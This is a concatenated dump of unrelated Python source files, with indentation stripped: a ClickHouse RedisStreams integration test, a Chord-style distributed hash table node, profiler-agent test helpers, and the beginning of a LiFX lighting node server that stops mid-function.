for i in range(20):
connection.xadd(stream_name, {"key": i, "value": i})
instance.query("DROP VIEW test.consumer")
for i in range(20, 40):
connection.xadd(stream_name, {"key": i, "value": i})
instance.query(
"""
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis;
"""
)
for i in range(40, 50):
connection.xadd(stream_name, {"key": i, "value": i})
while True:
result = instance.query("SELECT * FROM test.view ORDER BY key")
if redis_check_result(result):
break
redis_check_result(result, True)
instance.query("DROP VIEW test.consumer")
time.sleep(10)
for i in range(50, 60):
connection.xadd(stream_name, {"key": i, "value": i})
connection.close()
count = 0
while True:
count = int(instance.query("SELECT count() FROM test.redis"))
if count:
break
assert count > 0
def test_redis_predefined_configuration(redis_cluster):
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams(redis1) """
)
connection.xadd('named', {"key": 1, "value": 2})
while True:
result = instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if result == "1\t2\n":
break
def test_redis_not_ack_on_select(redis_cluster):
stream_name = 'not_ack_on_select'
group_name = 'test_not_ack_on_select'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_ack_on_select = false;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
connection.xadd(stream_name, {"key": 1, "value": 2})
while True:
result = instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if result == "1\t2\n":
break
time.sleep(5)
while True:
result = instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if result == "1\t2\n":
break
if __name__ == "__main__":
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
Node.py
|
import json
import socket
import time
from hashlib import sha1
import random
import threading
from queue import Queue
from copy import copy
# project files
from src import utils
from src.utils import log
from src.Finger import Finger
from src.rpc_handlers import REQUEST_MAP, STATUS_CONFLICT
from src.Storage import Storage
hash_func = sha1
Finger.hash_func = hash_func
class Node:
"""
Defines an E-Chord Node
"""
def __init__(self, port=None):
"""
Initializes a new node
"""
# data storage dictionary to hold (key, value) pairs
self.storage = Storage()
# RW mutex to avoid writes in the middle of RPCs
# RPCs are considered readers, the main thread is considered the writer
self.stabilize_mutex = utils.RWLock()
# create threads to listen for connections and to send stabilize signal
self.event_queue = Queue()
# set address for server and client
self.SERVER_ADDR = ("", port) if port is not None else (utils.get_ip(), utils.params["host"]["server_port"])
# initialize finger table and successor list
self.finger_table = [Finger(self.SERVER_ADDR)] * utils.params["ring"]["bits"]
self.successor_list = []
self.successor_list_index = -1
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# ID will be SHA-1(IP+port)
self.node_id = utils.get_id(self.SERVER_ADDR[0] + str(self.SERVER_ADDR[1]), hash_func)
log.debug(f"Initialized with node ID: {self.node_id}")
self.predecessor = None
# variable indicating intent to leave
# once true, the node will try to move its keys and leave after each stabilize
self.leaving = False
self.join_ring()
self.ask_peer((utils.params["seed_server"]["ip"], utils.params["seed_server"]["port"]),
"add_node", {"ip": self.SERVER_ADDR[0], "port": self.SERVER_ADDR[1], "node_id": self.node_id})
self.listen()
def join_ring(self):
"""
Joins ring by getting seed from seed server and asking it to find successor
:return: None
"""
while True:
# get initial node from seed server
data = self.get_seed()
log.debug("Asked seed server")
if data["header"]["status"] == STATUS_CONFLICT:
log.critical("ID conflict in network. Please change port.")
exit(1)
# Join ring
# if at least one other node exists
if data["header"]["status"] in range(200, 300):
log.info("Got seed from seed server")
log.debug(f"Seed address: {data['body']['ip'], data['body']['port']}")
seed_dead = False
while True:
self.predecessor = None
# get successor from seed node
log.info("Asking seed for successor")
response = self.ask_peer((data["body"]["ip"], data["body"]["port"]),
"find_successor", {"for_id": self.node_id})
if not response or response["header"]["status"] not in range(200, 300):
# tell seed server that seed node has died
self.ask_peer((utils.params["seed_server"]["ip"], utils.params["seed_server"]["port"]),
"dead_node", {"ip": data["body"]["ip"], "port": data["body"]["port"],
"node_id": data["body"]["node_id"]})
seed_dead = True
break
self.finger_table[0] = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
log.info("Got successor")
log.debug(f"Successor address: {self.finger_table[0].addr} with node ID: "
f"{self.finger_table[0].node_id}")
# initialize successor list, or get new successor if successor is dead
if self.init_successor_list():
log.info("Initialized successor list")
break
# if successor has died, wait for other nodes to stabilize before asking for new successor
log.info("Waiting for stabilization")
time.sleep(utils.params["ring"]["stabilize_delay"])
# if seed node is dead, reseed
if seed_dead:
log.info("Seed is dead, retrying...")
continue
# if this is the first node
else:
log.info("No other nodes in the network")
self.predecessor = Finger(self.SERVER_ADDR)
for i in range(len(self.successor_list)):
self.successor_list[i] = copy(self.predecessor)
log.info("Initialized predecessor and sucessor list to self")
break
def init_successor_list(self):
"""
Initializes successor_list
:return: True if successful, False if this node's successor is dead
"""
# ask successor for this node's successor list
log.info("Asking successor for this node's successor list")
response = self.ask_peer(self.finger_table[0].addr, "get_prev_successor_list", {})
# successor is dead
if not response:
log.info("Successor is dead")
return False
# populating this node's successor list
for i, successor in enumerate(response["body"]["successor_list"]):
new_finger = Finger((successor["ip"], successor["port"]), successor["node_id"])
try:
self.successor_list[i] = new_finger
except IndexError:
self.successor_list.append(new_finger)
return True
def find_key(self, key):
"""
Finds node that contains key and returns the key's value
:param key: the key
:return: the key's value, or None if not found
"""
key_id = utils.get_id(key, hash_func)
log.info(f"Finding value for ID {key_id}")
new_node = self.find_successor(key_id)
if not new_node:
log.debug("Couldn't find node")
return None
log.debug(f"Node found to store key has ID: {new_node[2]}")
response = self.ask_peer(new_node[:2], "lookup", {"key": key})
if not response or response["header"]["status"] not in range(200, 300):
log.debug("Couldn't find key")
return None
log.debug("Value found")
return response["body"]["value"]
def find_and_store_key(self, key, value):
"""
Finds node that key should be stored in and stores it there
If the key already exists, this will update its value with the given value
:param key: the key
:param value: the value of the key
:return: bool, whether the insertion was successful
"""
key_id = utils.get_id(key, hash_func)
log.info(f"Finding node to store key {key} with ID {key_id}")
new_node = self.find_successor(key_id)
if not new_node:
log.debug("Couldn't find node")
return False
log.debug(f"Node found to store key has ID: {new_node[2]}")
response = self.ask_peer(new_node[:2], "store_key", {"key": key, "value": value, "key_id": key_id})
if not response or response["header"]["status"] not in range(200, 300):
log.debug("Couldn't store key")
return False
log.debug("Pair stored")
return True
def find_and_delete_key(self, key):
"""
Finds node that key should be deleted from and deletes it
That node will deal with deleting backups
:param key: the key
:return: bool, whether the deletion was successful
"""
key_id = utils.get_id(key, hash_func)
log.info(f"Finding node to delete key {key} with ID {key_id}")
new_node = self.find_successor(key_id)
if not new_node:
log.debug("Couldn't find node")
return False
log.debug(f"Node found to delete key has ID: {new_node[2]}")
response = self.ask_peer(new_node[:2], "delete_key", {"key": key})
if not response or response["header"]["status"] not in range(200, 300):
log.debug("Couldn't delete key")
return False
log.debug("Pair deleted")
return True
def move_keys_to_predecessor(self):
"""
Moves keys from this node to predecessor
        The keys moved are the ones that should live on that node instead of this one
Condition for moving a key: key_id <= other_node.id
:return: bool; whether move was successful
"""
if self.predecessor.node_id == self.node_id:
return True
to_move = []
for key in self.storage:
# Keys that should be transferred are between current node (lower bound)
# and new node (inclusive upper bound)
# As it stands, the keys held by current node fall either after or before the new node
# The keys that fall between should be left with this node
# The keys that fall before the new node should be transferred to it
if utils.is_between_clockwise(self.storage.get_id(key), self.node_id, self.predecessor.node_id,
inclusive_upper=True):
to_move.append({"key": key, "value": self.storage[key], "key_id": self.storage.get_id(key)})
if not to_move:
return True
response = self.ask_peer(self.predecessor.addr, "batch_store_keys", {"keys": to_move}, pre_request=True)
if not response or response["header"]["status"] not in range(200, 300):
return False
# delete from local storage if keys were moved successfully
for key_dict in to_move:
del self.storage[key_dict["key"]]
return True
def move_keys_to_successor(self):
"""
Move all keys to successor before exiting
:return: bool; whether move was successful
"""
if self.finger_table[0].node_id == self.node_id:
return True
to_move = self.storage.dump()
if not to_move:
return True
response = self.ask_peer(self.finger_table[0].addr, "batch_store_keys", {"keys": to_move}, pre_request=True)
return bool(response)
def stabilize(self):
"""
Stabilize ring by updating successor or successor's predecessor
:return: None
"""
log.info("Stabilizing...")
current_successor = self.finger_table[0]
# ask all successors in successor list until one responds, remove dead ones
while len(self.successor_list):
response = self.ask_peer(current_successor.addr, "get_predecessor", {})
if not response:
# current successor was dead, get a new one from the successor list
log.info("Successor is dead, getting next in list")
log.debug(f"Successor dead is: {current_successor.addr}")
if self.predecessor and self.predecessor.node_id == current_successor.node_id:
self.predecessor = None
current_successor = self.successor_list[0]
del self.successor_list[0]
continue
self.finger_table[0] = current_successor
break
else:
log.info("All successors in successor list are dead")
self.join_ring()
return
status_ok = response["header"]["status"] in range(200, 300)
if status_ok:
# if successor has this node as predecessor
if self.node_id == response["body"]["node_id"]:
log.debug("Successor's predecessor is this node")
return
# check if successor's predecessor is dead
poll_response = self.ask_peer((response["body"]["ip"], response["body"]["port"]), "poll", {})
# if it is, notify successor and return
if not poll_response:
self.ask_peer(self.finger_table[0].addr, "clear_predecessor", {})
return
# if new node joined between this node and its successor
if utils.is_between_clockwise(response["body"]["node_id"], self.node_id, self.finger_table[0].node_id):
# shift successor list by 1
self.successor_list.insert(0, self.finger_table[0])
del self.successor_list[-1]
# update successor
self.finger_table[0] = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
log.info("Got new successor")
log.debug(f"New succesor address: {response['body']['ip'], response['body']['port']} with node ID: "
f"{response['body']['node_id']}")
# update successor's predecessor to be this node
self.ask_peer(self.finger_table[0].addr, "update_predecessor", {"ip": self.SERVER_ADDR[0],
"port": self.SERVER_ADDR[1],
"node_id": self.node_id})
log.debug("Asked successor to make this node its predecessor")
def fix_fingers(self):
"""
Fixes a random finger of the finger table
:return: None
"""
# TODO maybe priority here (and in successor list?)
log.info("Fixing a finger...")
i = random.randint(1, utils.params["ring"]["bits"] - 1)
log.debug(f"Picked finger {i}")
succ = self.find_successor((self.node_id + 2 ** i) % 2 ** utils.params["ring"]["bits"])
if not succ:
return
self.finger_table[i] = Finger((succ[0], succ[1]), succ[2])
def fix_successor_list(self):
"""
| 1. If successor list empty or index<0, ask successor for successor; if successor dead, end; if successor
| alive, place response at start of list (override or append); if index<0, index=0; end;
| 2. Else, ask current index node in successor list for successor
| 3. If alive and last in list and list is full, index=-1; end;
| 4. If alive and last in list and list not full, append new successor; index+=1; end;
| 5. If alive and not last in list, verify next; if same, index+=1; end; else if different, override next;
| index+=1; end;
| 6. If dead, remove node from successor list; index-=1; end;
:return: None
"""
log.info(f"Fixing successor {self.successor_list_index + 1}")
# ask successor for its successor
if not self.successor_list or self.successor_list_index == -1:
response = self.ask_peer(self.finger_table[0].addr, "get_successor", {})
if not response or response["header"]["status"] not in range(200, 300):
log.debug("Successor didn't respond")
return
if not self.successor_list:
self.successor_list.append(Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"]))
elif response["body"]["node_id"] != self.successor_list[0].node_id:
self.successor_list[0] = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
self.successor_list_index = 0
log.debug("Updated successor list")
return
# mods index in case stabilize has removed any successors from list
self.successor_list_index %= len(self.successor_list)
response = self.ask_peer(self.successor_list[self.successor_list_index].addr, "get_successor", {})
# current node dead, remove from successor list and decrement index
if not response:
del self.successor_list[self.successor_list_index]
self.successor_list_index -= 1
log.debug("Removed dead node from successor list")
return
# current node alive and last in list
if self.successor_list_index == len(self.successor_list) - 1:
# list at max capacity
if len(self.successor_list) == utils.params["ring"]["bits"]:
self.successor_list_index = -1
log.debug("Verified successor list")
return
# list not at max capacity
self.successor_list.append(Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"]))
log.debug("Added new successor to successor list")
self.successor_list_index += 1
return
# current node alive and not last in list
self.successor_list_index += 1
if response["body"]["node_id"] == self.successor_list[self.successor_list_index].node_id:
log.debug("Verified successor list")
return
self.successor_list[self.successor_list_index] = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
log.debug("Updated successor list")
def find_successor(self, key_id):
"""
Finds successor for key_id
:param key_id: the ID
        :return: tuple of (IP, port, node_id), or None if lookup failed
"""
log.debug(f"Finding successor for ID: {key_id}")
# if this is the only node in the network
if self.finger_table[0].node_id == self.node_id:
return self.SERVER_ADDR[0], self.SERVER_ADDR[1], self.node_id
current_node = self.find_predecessor(key_id)
if not current_node:
return None
response = self.ask_peer(current_node, "get_successor", {})
if not response:
return None
return response["body"]["ip"], response["body"]["port"], response["body"]["node_id"]
def find_predecessor(self, key_id):
"""
Finds predecessor for key_id
:param key_id: the ID
        :return: (IP, port) address of the predecessor node, or None if lookup failed
"""
log.debug(f"Finding predecessor for ID: {key_id}")
current_node = Finger(self.SERVER_ADDR, self.node_id)
successor_id = self.finger_table[0].node_id
# keep fallback fingers in case first returned finger is dead
prev_fingers = []
# keep visited nodes to prevent infinite loops
visited_ids = set()
# while key_id is not between node_id and successor_id (while moving clockwise)
while not utils.is_between_clockwise(key_id, current_node.node_id, successor_id, inclusive_upper=True):
# log.debug(f"condition: {current_node.node_id} < {key_id} <= {successor_id}")
# if this finger died in the meantime, get next finger from previous response
while True:
# ask for closest preceding finger (this will also return fallback fingers, if found)
if current_node.node_id not in visited_ids:
response = self.ask_peer(current_node.addr, "get_closest_preceding_finger", {"for_key_id": key_id})
visited_ids.add(current_node.node_id)
else:
response = None
if response:
break
if not prev_fingers:
return None
next_node = prev_fingers.pop(0)
current_node = Finger((next_node["ip"], next_node["port"]), next_node["node_id"])
returned_nodes = response["body"]["fingers"]
prev_fingers = list(returned_nodes)
# request successor from each returned node
for node in returned_nodes:
response2 = self.ask_peer((node["ip"], node["port"]), "get_successor", {})
# if response was received, break
if response2:
current_node = Finger((node["ip"], node["port"]), node["node_id"])
break
prev_fingers.remove(node)
# if all returned nodes are dead
else:
# if successor was contained in nodes, it is dead, so lookup fails
if response["body"]["contains_successor"]:
return None
else:
# get current_node's successor
response = self.ask_peer(current_node.addr, "get_successor", {})
current_node = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
# ask successor for its successor
response2 = self.ask_peer(current_node.addr, "get_successor", {})
# if that node is dead, lookup fails
if not response2:
return None
prev_fingers = []
successor_id = response2["body"]["node_id"]
return current_node.addr
def closest_preceding_finger(self, key_id):
"""
Gets closest preceding finger for id key_id, as well as fallback fingers
:param key_id: the ID
        :return: list of Fingers: the closest preceding node followed by fallback fingers, or [self] if this node is the closest preceding node
"""
log.debug(f"Finding closest preceding finger for ID: {key_id}")
for i in range(utils.params["ring"]["bits"] - 1, -1, -1):
if utils.is_between_clockwise(self.finger_table[i].node_id, self.node_id, key_id):
# get index of first fallback finger
starting_index = i - utils.params["ring"]["fallback_fingers"]
starting_index = starting_index if starting_index >= 0 else 0
# get fallback fingers
fingers = self.finger_table[starting_index:i + 1]
fingers.reverse()
j = 0
# fill in with successor list nodes if there are not enough fallback fingers (low index)
while len(fingers) < utils.params["ring"]["fallback_fingers"] + 1 and j < len(self.successor_list):
fingers.append(self.successor_list[j])
j += 1
return fingers
return [Finger(self.SERVER_ADDR, self.node_id)]
def ask_peer(self, peer_addr, req_type, body_dict, pre_request=False):
"""
Makes request to peer, sending request_msg
Releases writer lock if it is enabled, so RPCs can be handled while waiting for response
Re-locks writer at the end of the method call if it was enabled
:param peer_addr: (IP, port) of peer
:param req_type: type of request for request header
:param body_dict: dictionary of body
:param pre_request: whether request should be preceded by request of type size
        :return: peer's response parsed into a dict, or None if the peer could not be reached
"""
w_mode = self.stabilize_mutex.w_locked()
if w_mode:
self.stabilize_mutex.w_leave()
request_msg = utils.create_request({"type": req_type}, body_dict)
# if request is on this node, call RPC handler directly
if peer_addr == self.SERVER_ADDR:
data = REQUEST_MAP[req_type](self, body_dict)
# else, make request for RPC
else:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
client.settimeout(utils.params["net"]["timeout"])
try:
client.connect(peer_addr)
enc_request_msg = request_msg.encode()
if pre_request:
pre_req_msg = utils.create_request({"type": "size"}, {"data_size": len(enc_request_msg)})
# using $ as delimiter to identify pre-requests
pre_req_msg = "$" + pre_req_msg + "$"
client.sendall(pre_req_msg.encode())
client.sendall(enc_request_msg)
data = client.recv(utils.params["net"]["data_size"]).decode()
except (socket.error, socket.timeout):
if w_mode:
self.stabilize_mutex.w_enter()
return None
if w_mode:
self.stabilize_mutex.w_enter()
if not data:
return None
return json.loads(data)
def get_seed(self):
"""
Gets an existing node from seed server
        :return: parsed seed-server response (dict with header and body, containing an existing node's IP, port and ID)
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
client.settimeout(utils.params["net"]["timeout"])
for i in range(utils.params["seed_server"]["attempt_limit"]):
try:
client.connect((utils.params["seed_server"]["ip"], utils.params["seed_server"]["port"]))
break
except (socket.error, socket.timeout):
log.info(f"Failed to connect to seed server, retrying... "
f"{i + 1}/{utils.params['seed_server']['attempt_limit']}")
time.sleep(2)
else:
log.critical("Connection to seed failed (attempt limit reached)")
exit(1)
client.sendall(utils.create_request({"type": "get_seed"},
{"ip": self.SERVER_ADDR[0], "port": self.SERVER_ADDR[1],
"node_id": self.node_id}).encode())
data = json.loads(client.recv(utils.params["net"]["data_size"]).decode())
return data
def listen(self):
"""
Main server loop
Starts threads for accepting new connections, as well as timing stabilize
Reads shared queue for new data and handles it accordingly
        The main thread is the single writer: any other thread that needs to modify node state passes it through the queue
:return: None
"""
log.info(f"Starting node on {self.SERVER_ADDR[0]}:{self.SERVER_ADDR[1]}")
# bind server to IP
self.server.bind(self.SERVER_ADDR)
self.server.listen()
# accept incoming connections
connection_listener = threading.Thread(target=self.accept_connections,
args=(self.server, self))
connection_listener.name = "Connection Listener"
connection_listener.daemon = True
# initialize timer for stabilization of node
stabilizer = threading.Thread(target=self.stabilize_timer,
args=(self.event_queue, utils.params["ring"]["stabilize_delay"]))
stabilizer.name = "Stabilizer"
stabilizer.daemon = True
connection_listener.start()
stabilizer.start()
while True:
# wait until event_queue is not empty, then pop
data = self.event_queue.get()
self.stabilize_mutex.w_enter()
log.debug(f"Popped {data} from event queue")
# data == 0 is used for stabilize event
if not data:
self.stabilize()
if self.leaving and self.move_keys_to_successor():
break
self.fix_successor_list()
self.fix_fingers()
# if data is function, call it to update state in main thread
elif callable(data):
data(self)
# if data == 1, immediate leave should be attempted
else:
if self.move_keys_to_successor():
break
self.stabilize_mutex.w_leave()
# Thread Methods
@staticmethod
def accept_connections(server, node):
"""
Accepts a new connection on the passed socket and starts a new thread to handle it
:param server: the socket
:param node: the node
:return: None
"""
while True:
# wait for new connection
conn_details = server.accept()
log.info(f"Got new connection from: {conn_details[1]}")
# start new thread to handle connection
connection_handler = threading.Thread(target=Node.handle_connection, args=(node, conn_details))
connection_handler.name = f"{conn_details[1]} Handler"
connection_handler.start()
@staticmethod
def handle_connection(node, conn_details):
"""
Handles existing connection until it closes
:param node: the node on which to call the method
:param conn_details: connection details (connection, address)
:return: None
"""
connection, address = conn_details
with connection:
data = connection.recv(utils.params["net"]["data_size"]).decode()
if not data:
return
# if $ is first character, pre_request is contained
if data[0] == "$":
# split to ['', pre_request, main_request]
data = data.split("$")
# pre-request is the first part of the received data
pre_request = data[1]
pre_request = json.loads(pre_request)
data_size = pre_request["body"]["data_size"]
# anything received after is part of the main request
main_request = "".join(data[2:])
size_received = len(main_request.encode())
# data might be large chunk, so read in batches
while size_received < data_size:
next_data = connection.recv(utils.params["net"]["data_size"])
size_received += len(next_data)
main_request += next_data.decode()
data = main_request
data = json.loads(data)
# ensure all expected arguments have been sent
for arg in utils.EXPECTED_REQUEST[data["header"]["type"]]:
if arg not in data["body"]:
return
log.debug(f"Got RPC call of type: {data['header']['type']}")
# get mutex so main thread doesn't change object data during RPC
node.stabilize_mutex.r_enter()
# select RPC handler according to RPC type
response = REQUEST_MAP[data["header"]["type"]](node, data["body"])
node.stabilize_mutex.r_leave()
connection.sendall(response.encode())
@staticmethod
def stabilize_timer(event_queue, delay):
"""
        Repeatedly sleeps for the specified amount of time, then places 0 in the queue to trigger stabilization
:param event_queue: shared queue
:param delay: amount of time to sleep for
:return: None
"""
while True:
time.sleep(delay)
event_queue.put(0)
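# --- Illustrative sketch (not part of the original node implementation) ---
# ask_peer() and handle_connection() above frame large requests by sending an
# optional "size" pre-request wrapped in '$' delimiters, so the receiver knows
# how many bytes of the main request to expect. The helpers below restate that
# framing in isolation; they assume the same {"header": ..., "body": ...} JSON
# layout produced by utils.create_request() and use hypothetical names chosen
# only for this example.
def _frame_with_size_prerequest(request_msg):
    """Prefix an encoded request with a '$'-delimited size pre-request."""
    encoded = request_msg.encode()
    pre_request = json.dumps({"header": {"type": "size"},
                              "body": {"data_size": len(encoded)}})
    return ("$" + pre_request + "$").encode() + encoded
def _split_size_prerequest(data):
    """Return (expected_size, start_of_main_request) from '$'-framed data."""
    # data looks like: $<size pre-request JSON>$<start of main request>
    _, pre_request, *rest = data.split("$")
    expected_size = json.loads(pre_request)["body"]["data_size"]
    return expected_size, "".join(rest)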
|
help_utils.py
|
import threading
import time
from queue import Queue
INTEGRATION_TEST_ACCOUNT_ID = "519630429520"
MY_PROFILING_GROUP_NAME_FOR_INTEG_TESTS = "MyProfilingGroupForIntegrationTests"
DUMMY_TEST_PROFILING_GROUP_NAME = "DummyNameThatWillNotBeUsed"
FILE_PREFIX = "pytest-CodeGuruPythonAgent"
class HelperThreadRunner:
def __init__(self):
pass
def new_helper_sleep_thread(self, sleep_sec=1, thread_name="test-sleep-thread"):
self.sleep_thread = threading.Thread(
name=thread_name, target=self.sleep_for, daemon=True, kwargs={"sleep_sec": sleep_sec})
self.sleep_thread.start()
def sleep_for(self, sleep_sec):
time.sleep(sleep_sec)
def new_helper_thread_blocked_inside_dummy_method(
self, thread_name="test-thread"):
self.ready_queue = Queue()
self.done_queue = Queue()
self.thread = threading.Thread(
name=thread_name, target=self.dummy_parent_method)
self.thread.start()
self.ready_queue.get()
def stop_helper_thread(self):
self.done_queue.put(True)
self.thread.join()
def dummy_method(self):
"""
        Running this function in a thread provides us with a test stack to compare against.
"""
self.ready_queue.put(True)
self.done_queue.get()
def dummy_parent_method(self):
"""
        By creating a function that calls dummy_method, we create an ordered stack for testing.
"""
self.dummy_method()
def wait_for(condition, timeout_seconds=1.0, poll_interval_seconds=0.01):
"""
    Polls the given condition until it returns a truthy value or the timeout expires; raises an Exception on timeout.
"""
end_time = time.time() + timeout_seconds
while time.time() < end_time:
if condition():
return True
time.sleep(poll_interval_seconds)
raise Exception("wait_for: Timed out waiting for condition to be true")
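# --- Illustrative usage sketch (not part of the original helpers) ---
# A minimal example of how wait_for() and HelperThreadRunner are meant to be
# combined in a test: start a helper thread blocked inside dummy_method, wait
# until it is visible to the interpreter, then unblock and join it. The thread
# name used here is an arbitrary example value.
def _example_wait_for_blocked_thread():
    runner = HelperThreadRunner()
    runner.new_helper_thread_blocked_inside_dummy_method(thread_name="example-blocked-thread")
    try:
        # wait_for() returns True once the condition holds, or raises on timeout
        wait_for(lambda: any(t.name == "example-blocked-thread"
                             for t in threading.enumerate()),
                 timeout_seconds=2.0)
    finally:
        runner.stop_helper_thread()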
|
lifx-poly.py
|
#!/usr/bin/env python3
##!/home/e42/dev/py3_envs/udi-lifx-poly-venv/bin/python
"""
LiFX NodeServer for UDI Polyglot v2
by Einstein.42 (James Milne) milne.james@gmail.com
"""
import polyinterface
import time
import sys
import lifxlan
from copy import deepcopy
import json
import yaml
from threading import Thread
from pathlib import Path
import math
LOGGER = polyinterface.LOGGER
BR_INCREMENT = 2620 # this is ~4% of 65535
BR_MIN = 1310 # minimum brightness value ~2%
BR_MAX = 65535 # maximum brightness value
FADE_INTERVAL = 5000 # 5s
BRTDIM_INTERVAL = 400 # 400ms
with open('server.json') as data:
SERVERDATA = json.load(data)
data.close()
try:
VERSION = SERVERDATA['credits'][0]['version']
except (KeyError, ValueError):
LOGGER.info('Version not found in server.json.')
VERSION = '0.0.0'
# Changing these will not update the ISY names and labels; you will have to edit the profile.
COLORS = {
0: ['RED', [62978, 65535, 65535, 3500]],
1: ['ORANGE', [5525, 65535, 65535, 3500]],
2: ['YELLOW', [7615, 65535, 65535, 3500]],
3: ['GREEN', [16173, 65535, 65535, 3500]],
4: ['CYAN', [29814, 65535, 65535, 3500]],
5: ['BLUE', [43634, 65535, 65535, 3500]],
6: ['PURPLE', [50486, 65535, 65535, 3500]],
7: ['PINK', [58275, 65535, 47142, 3500]],
8: ['WHITE', [58275, 0, 65535, 5500]],
9: ['COLD_WHTE', [58275, 0, 65535, 9000]],
10: ['WARM_WHITE', [58275, 0, 65535, 3200]],
11: ['GOLD', [58275, 0, 65535, 2500]]
}
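# --- Illustrative sketch (not part of the original node server) ---
# The node classes below repeatedly convert between the ISY's 0-255 DON level,
# LiFX's 0-65535 HSBK brightness (clamped to BR_MIN..BR_MAX), the percentage
# reported on the ST driver, and WiFi signal strength in dBm. These helpers
# just restate that arithmetic in one place; the names are hypothetical and
# used only for illustration.
def _isy_level_to_lifx_brightness(level):
    """Map an ISY 0-255 level onto the clamped 0-65535 LiFX brightness range."""
    bri = int(round(int(level) * 65535 / 255))
    return max(BR_MIN, min(BR_MAX, bri))
def _lifx_brightness_to_percent(bri):
    """Mirror of Light._bri_to_percent(): 0-65535 brightness as a percentage."""
    return float(round(bri * 100 / 65535, 4))
def _wifi_mw_to_dbm(signal_mw):
    """Round a received signal power in milliwatts to whole dBm (10*log10(mW))."""
    return math.floor(10 * math.log10(signal_mw) + 0.5)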
class Controller(polyinterface.Controller):
def __init__(self, polyglot):
super().__init__(polyglot)
self.lifxLan = None
self.name = 'LiFX Controller'
self.discovery_thread = None
self.update_nodes = False
self.change_pon = True
self.ignore_second_on = False
self.bulbs_found = 0
def start(self):
LOGGER.info('Starting LiFX Polyglot v2 NodeServer version {}, LiFX LAN: {}'.format(VERSION, lifxlan.__version__))
if 'change_no_pon' in self.polyConfig['customParams']:
LOGGER.debug('Change of color won\'t power bulbs on')
self.change_pon = False
if 'ignore_second_on' in self.polyConfig['customParams']:
LOGGER.debug('DON will be ignored if already on')
self.ignore_second_on = True
self._checkProfile()
self.discover()
LOGGER.debug('Start complete')
def stop(self):
LOGGER.info('Stopping LiFX Polyglot v2 NodeServer version {}'.format(VERSION))
def _checkProfile(self):
profile_version_file = Path('profile/version.txt')
if profile_version_file.is_file() and 'customData' in self.polyConfig:
with profile_version_file.open() as f:
profile_version = f.read().replace('\n', '')
f.close()
if 'prof_ver' in self.polyConfig['customData']:
if self.polyConfig['customData']['prof_ver'] != profile_version:
self.update_nodes = True
else:
self.update_nodes = True
if self.update_nodes:
LOGGER.info('New Profile Version detected: {}, all nodes will be updated'.format(profile_version))
cust_data = deepcopy(self.polyConfig['customData'])
cust_data['prof_ver'] = profile_version
self.saveCustomData(cust_data)
self.updateNode(self)
def shortPoll(self):
if self.discovery_thread is not None:
            if self.discovery_thread.is_alive():
LOGGER.debug('Skipping shortPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].update()
def longPoll(self):
if self.discovery_thread is not None:
            if self.discovery_thread.is_alive():
LOGGER.debug('Skipping longPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].long_update()
def update(self):
pass
def long_update(self):
pass
def discover(self, command=None):
self.lifxLan = lifxlan.LifxLAN()
if self.discovery_thread is not None:
            if self.discovery_thread.is_alive():
LOGGER.info('Discovery is still in progress')
return
self.discovery_thread = Thread(target=self._discovery_process)
self.discovery_thread.start()
def _manual_discovery(self):
try:
f = open(self.polyConfig['customParams']['devlist'])
except Exception as ex:
LOGGER.error('Failed to open {}: {}'.format(self.polyConfig['customParams']['devlist'], ex))
return False
try:
data = yaml.safe_load(f.read())
f.close()
except Exception as ex:
LOGGER.error('Failed to parse {} content: {}'.format(self.polyConfig['customParams']['devlist'], ex))
return False
if 'bulbs' not in data:
LOGGER.error('Manual discovery file {} is missing bulbs section'.format(self.polyConfig['customParams']['devlist']))
return False
for b in data['bulbs']:
name = b['name']
address = b['mac'].replace(':', '').lower()
mac = b['mac']
ip = b['ip']
if not address in self.nodes:
self.bulbs_found += 1
if b['type'] == 'multizone':
d = lifxlan.MultiZoneLight(mac, ip)
                    # Save object reference if we need it for group membership
b['object'] = d
LOGGER.info('Found MultiZone Bulb: {}({})'.format(name, address))
self.addNode(MultiZone(self, self.address, address, name, d), update = self.update_nodes)
else:
d = lifxlan.Light(mac, ip)
                    # Save object reference if we need it for group membership
b['object'] = d
LOGGER.info('Found Bulb: {}({})'.format(name, address))
self.addNode(Light(self, self.address, address, name, d), update = self.update_nodes)
self.setDriver('GV0', self.bulbs_found)
if 'groups' not in data:
LOGGER.info('Manual discovery file {} is missing groups section'.format(self.polyConfig['customParams']['devlist']))
return True
for grp in data['groups']:
members = []
for member_light in grp['members']:
light_found = False
for b in data['bulbs']:
if b['name'] == member_light:
members.append(b['object'])
light_found = True
break
if not light_found:
LOGGER.error('Group {} light {} is not found'.format(grp['name'], member_light))
LOGGER.info('Group {}, {} members'.format(grp['name'], len(members)))
if len(members) > 0:
gaddress = grp['address']
glabel = grp['name']
if not gaddress in self.nodes:
